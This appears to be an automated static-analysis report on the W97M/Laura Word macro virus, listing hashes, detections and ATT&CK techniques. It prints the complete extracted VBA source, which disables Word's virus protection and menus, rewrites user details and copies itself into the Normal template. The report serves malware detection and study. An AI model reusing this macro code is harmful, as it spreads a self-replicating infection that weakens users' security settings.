W97M/Laura — Office (OLE) malware analysis

Static analysis result for SHA-256 24b64063bf62440a…

MALICIOUS

Office (OLE)

35.0 KB Created: 2000-08-09 14:07:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 020e3e94ef75faaf07c6dea5410c8892 SHA-1: 3368d5efebc084cf75c0a9e141acb8883daa7497 SHA-256: 24b64063bf62440a4217a15e0296691b0f6bbd940e227978f667a92101536c82
120 Risk Score

Malware Insights

W97M/Laura · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to modify application settings and displays a message box with the text 'Laura, I love you.' The heuristic 'ClamAV: Doc.Trojan.Laura-1' and the presence of 'Total Konfuzion' in the document body and script strongly suggest the 'Laura' family. The macro also checks and potentially modifies a registry key related to virus protection.

Heuristics 3

  • ClamAV: Doc.Trojan.Laura-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Laura-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2711 bytes
SHA-256: de7377cdea32dae3c957ec83ede6d76787d5e6192a2b8592a172269846f1bf73
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Laura()
    t = "W97M/Laura"
    l = "     Laura, I love you.     "
    m = "        -Total Konfuzion-"
    If Day(17) Then
        MsgBox l & vbCr & vbCr & m, vbSystemModal, t
        ActiveDocument.Shapes.AddTextEffect(msoTextEffect8, "Laura, I love you.", "Comic Sans MS", 36#, msoFalse, msoFalse, 155.6, 176.6).Select
        CommandBars("WordArt").Visible = (Rnd * 0)
        Beep
    End If
End Sub
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        t = "W97M/Laura"
        l = "Laura, I love you."
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
        End With
        With Application
            .EnableCancelKey = wdCancelDisabled
            .UserName = "Total Konfuzion"
            .UserInitials = "TK"
            .UserAddress = t & vbCr & l
        End With
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...") = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...") = (Rnd * 0)
        With Dialogs(wdDialogFileSummaryInfo)
            .Author = "Total Konfuzion"
            .Subject = "W97M/Laura"
            .Comments = "Laura, I love you"
            .Keywords = "-Total Konfuzion-"
            .Execute
        End With
        StatusBar = l
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        Call Laura
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
' W97M/Laura
'   by: Total Konfuzion
' Just to express my true love
' for you darling.. xxx
End Sub
Sub HelpAbout()
    t = "W97M/Laura"
    m = " -Total Konfuzion-"
    Application.Caption = t & "   -   " & "Laura, I love you."
    MsgBox "    " & t & vbCr & vbCr & m, vbSystemModal, t
    Dialogs(wdDialogHelpAbout).Show
End Sub